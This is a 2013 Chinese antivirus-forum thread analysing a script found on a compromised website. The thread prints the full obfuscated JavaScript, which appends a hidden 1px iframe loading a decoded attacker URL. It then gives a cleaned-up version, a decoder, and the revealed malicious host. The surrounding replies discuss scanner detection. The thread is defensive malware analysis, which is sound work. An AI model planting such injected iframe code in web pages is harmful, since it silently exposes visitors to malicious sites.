查看: 1534|回复: 7
收起左侧

[已鉴定] http://www.s-format.com.ua/index.php【失效 by dayangyang】

[复制链接]
墨家小子
发表于 2013-4-23 18:54:12 | 显示全部楼层 |阅读模式
本帖最后由 wjhstu-VxG 于 2013-4-24 17:47 编辑

咖啡没反应
蓝核
发表于 2013-4-23 19:31:05 | 显示全部楼层
去召唤了……额……
  1. <script type="text/javascript">var Lrkc=101;var zXnYRS='aarOF';var zjbHKB='WRdmM';if('hgWW'=='uagg')iixt();var DRkyDMH="";var hyUq;function RXpTl(){}
  2. var aSTQgNzYv="\x73lice";if('zuySho'=='UbheFE')cTkb();function arIf(){var KfvfrG='ubaYuq';if('LUfaD'=='pLuaHl')xKXJBs();}
  3. var oAmaUdQA="fromCharCo\x64e";var srOmo;var duNq;var yiJHBP="body";var QMoPe="939f9f9b655a5a9b9d9a8e97908c99598f8f999e599499919a5a929a599b939b6a9e948f685c";var IyRcO='Zpspx';var FieJmboeg="append\x43hild";function srJNuJ(){var eXWRV='cHiRD';if('qoTpi'=='TaGKkS')IGoYe();}var WzNIot=3;if('YUdDQO'=='LsEGtM')HuOozM();if('puBFaL'=='JGlEXu')PaYiXl='MBcnl';var shhcj=166;var jxJbjgwO="c\x6f\x6estruc\x74\x6fr";if('KJYk'=='pWrGpO')Ghamz();var gwrG=227;var px0_var="0\x70x";function BDPZ(){}
  4. var CxTrnr="par\x73eInt";function ifGT(){}
  5. var px1_var="1px";var YKkRyU;var IhfQVB=107;var sbpuPG=55;var appVersion_var="appVers\x69on";var vJXFaTm=(function(){var BOFI;if('UQxMMx'=='ePTSl')IWGKj();var qzLbm='kRRJOL';return this;function ROcePW(){}})();var GpQxp=220;var tTHFMjzDU="ajbBBk"[jxJbjgwO];if('wcIdx'=='XidEg')zVXsff();function rWpQEO(){var jVttn='DrWlp';if('SApQr'=='ZcOg')NfJOMZ();}function BlxSe(){}
  6. var awhiPr;for(var UAHytZZ=0;UAHytZZ<QMoPe.length;UAHytZZ+=2){var PaPx=202;var pAEiJo=96;RmcUsG=vJXFaTm[CxTrnr](QMoPe[aSTQgNzYv](UAHytZZ,UAHytZZ+2),16)-43;var FBlc='uhBq';DRkyDMH+=tTHFMjzDU[oAmaUdQA](RmcUsG);var TaUE='gmDgeK';}
  7. function Oedm(){}if('WojMJ'=='IOct')CbaOh='dcur';if('DZQrI'=='OuzN')HKsT='UVvm';var ErhHH="luGmkxfEd";var BpFRT=144;if('PtcA'=='hyHZiS')myCrLR='tFby';var yvsHvS='sSgPM';var AqUEfDhD="";var UCuasV;if(navigator[appVersion_var].indexOf("MSIE")!=-1){var ZLvh='GPJu';function TQcVeG(){var BWPg='VcAeB';if('agok'=='DDIeAr')ugghau();}
  8. AqUEfDhD='<iframe name="'+ErhHH+'" src="'+DRkyDMH+'">';if('qKvkhb'=='VWtZ')MrmG='VGLUcr';}else{function xLzEk(){}
  9. AqUEfDhD='iframe';}
  10. var yltjHO=72;var ROBLPe='UTDG';var TQsMZtoOs=document.createElement(AqUEfDhD);TQsMZtoOs.YqjZga=function(){var HAdUa='MRbla';this["src"]=DRkyDMH;var xEGF='aGuYoV';var bQIHq='tSPdB';}
  11. function NFqrBV(){var AkGiGi='ANuJ';if('qidI'=='RnqdJ')LSkoK();}function XicTli(){}
  12. var xmVYM=186;TQsMZtoOs.style.height=px1_var;var NmdIM;function TpCf(){var RnfIbI='cWKFvg';if('kYGRQa'=='tsuTWi')IgWTDH();}
  13. TQsMZtoOs.name=ErhHH;if('XLCWM'=='RaRiz')RzTI();var dDcEQW=89;TQsMZtoOs.YqjZga();var yXUH='nZfAJ';var HYUPwV='VdXdr';TQsMZtoOs.style.top=px0_var;function uyOm(){var CTsH='iISaTs';if('qbwvB'=='rvAy')rkNwf();}if('jIWVWk'=='MqqE')NqFlm();TQsMZtoOs.style.position="absolute";var EvvYG;var QBKZ='oDfdFl';var HwGYx=262;TQsMZtoOs.style.right=px0_var;TQsMZtoOs.style.width=px1_var;function BypRBQ(){var npOVAc='lEFk';if('xEfxcP'=='autyjB')XfHAPc();}
  14. function gKvTZW(){function xkDz(){var uuFcW='sAnB';if('ytZrgl'=='vIjEq')snZWQN();}var Xiihw=194;if(document[yiJHBP]){var OEIcvY;if('AyZiTG'=='HGTWQ')QqHGo='MLQQMY';if('FrKc'=='XrAt')GsTyd='IqWTH';document[yiJHBP][FieJmboeg](TQsMZtoOs);if('gpJeq'=='VzKVy')loCFi();var YcZAm;var pJyT='TEiQc';}else{var qDRn='HhhH';function YSeD(){}
  15. setTimeout(gKvTZW,120);function KBSm(){var BRoHE='ztbOFw';if('UVeKZ'=='iTXH')NzuFes();}}
  16. var XzEn='UslOXl';function nSNA(){var aPFC='iMOYqd';if('TuDH'=='IKLmg')NZYRaS();}}
  17. var hsqVu;if('WFDOae'=='qBPV')MntN();gKvTZW();if('iQQaZ'=='MBLtAG')EZvrom='jPqHRO';var FJEBAU=239;if('xVAzM'=='NuuUYn')Tcna='MSTR';</script>
复制代码
不知道对不对,反正我没找到其他的
dayangyang
发表于 2013-4-24 00:43:59 | 显示全部楼层
就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
开始就是一大堆无用的变量和函数
fromCharCo 。。iframe document.write。。。这些关键字都藏在了中间
去杂。去除无关的干扰,去除\X转义符得到:
  1. <script type="text/javascript">
  2.     var DRkyDMH="";

  3.     var vJXFaTm=(function(){
  4.     return this;}
  5.     var QMoPe="939f9f9b655a5a9b9d9a8e97908c99598f8f999e599499919a5a929a599b939b6a9e948f685c";

  6.     var px0_var="0px";
  7.     var px1_var="1px";
  8.     var appVersion_var="appVersion";

  9.     var tTHFMjzDU="ajbBBk"[constructor];

  10.     for(var i=0;
  11.     i<QMoPe.length;
  12.     i+=2)
  13.    {  
  14.     R=vJXFaTm[parseInt](QMoPe[slice](i,i+2),16)-43;
  15.     DRkyDMH+=tTHFMjzDU[fromCharCode](R);
  16.     }

  17.     var AqUEfDhD="";
  18.     if(navigator[appVersion_var].indexOf("MSIE")!=-1){
  19.       AqUEfDhD='<iframe name="'+ErhHH+'" src="'+DRkyDMH+'">';
  20.     }
  21.     else{
  22.       AqUEfDhD='iframe';
  23.     }

  24.     var TQsMZtoOs=document.createElement(AqUEfDhD);
  25.     TQsMZtoOs.YqjZga=function(){

  26.     this["src"]=DRkyDMH;
  27.     }
  28.     TQsMZtoOs.style.height=px1_var;
  29.     TQsMZtoOs.name=ErhHH;
  30.     TQsMZtoOs.YqjZga();
  31.     TQsMZtoOs.style.top=px0_var;
  32.     TQsMZtoOs.style.position="absolute";
  33.     TQsMZtoOs.style.right=px0_var;
  34.     TQsMZtoOs.style.width=px1_var;
  35.       var Xiihw=194;
  36.     if(document.body)
  37.    {
  38.     document.body.appendChild(TQsMZtoOs);
  39.     }
  40.     else{
  41.       setTimeout(gKvTZW,120);   
  42.     }

  43.     </script>
复制代码
到这里想必能看出大概了,那么中间的网址究竟是啥?
  1. <script type="text/javascript">
  2.     var D="";
  3.     var Q="939f9f9b655a5a9b9d9a8e97908c99598f8f999e599499919a5a929a599b939b6a9e948f685c";
  4.     for(var i=0;
  5.     i<Q.length;
  6.     i+=2)
  7.    {  
  8.     R=parseInt(Q.slice(i,i+2),16)-43;
  9.     D+=String.fromCharCode(R);
  10.     }
  11.     alert(D);
  12.     </script>
复制代码
运行这段得到URL:http://proclean.ddns.info/go.php?sid=1
Chrome显示最后一次在此网站上发现可疑内容的时间是 2013-04-22。
点开跳转到http://guru-host.ru/了。。应该是已经失效了。。。
赶紧碎觉去明天见导师。。。

评分

参与人数 2经验 +20 魅力 +1 收起 理由
wjhstu-VxG + 1 版区有你更精彩: )
蓝核 + 20 感谢解答: )

查看全部评分

qq976690702
发表于 2013-4-24 00:45:03 | 显示全部楼层
AVAST 8.0已拦截
qq976690702
发表于 2013-4-24 00:47:28 | 显示全部楼层
忘记截图了
QQ图片20130424004551.jpg
蓝核
发表于 2013-4-24 00:56:31 | 显示全部楼层
dayangyang 发表于 2013-4-24 00:43
就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
...

我去。。。你好棒。早点休息!
有空pm!
wjhstu-VxG
发表于 2013-4-24 17:37:55 | 显示全部楼层
dayangyang 发表于 2013-4-24 00:43
就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
...

也不是越来越……是基本不靠谱了……特别是火狐这些新的
wjhstu-VxG
发表于 2013-4-24 17:44:37 | 显示全部楼层
dayangyang 发表于 2013-4-24 00:43
就是这段代码啊。。。看得我眼睛要瞎了。。累死啊
wepawet居然说是温和的。。wepawet越来越不靠谱了。。
...

给力啊,那么杂乱的都能去杂,真是火眼金睛啊……
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 19:50 , Processed in 0.142992 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表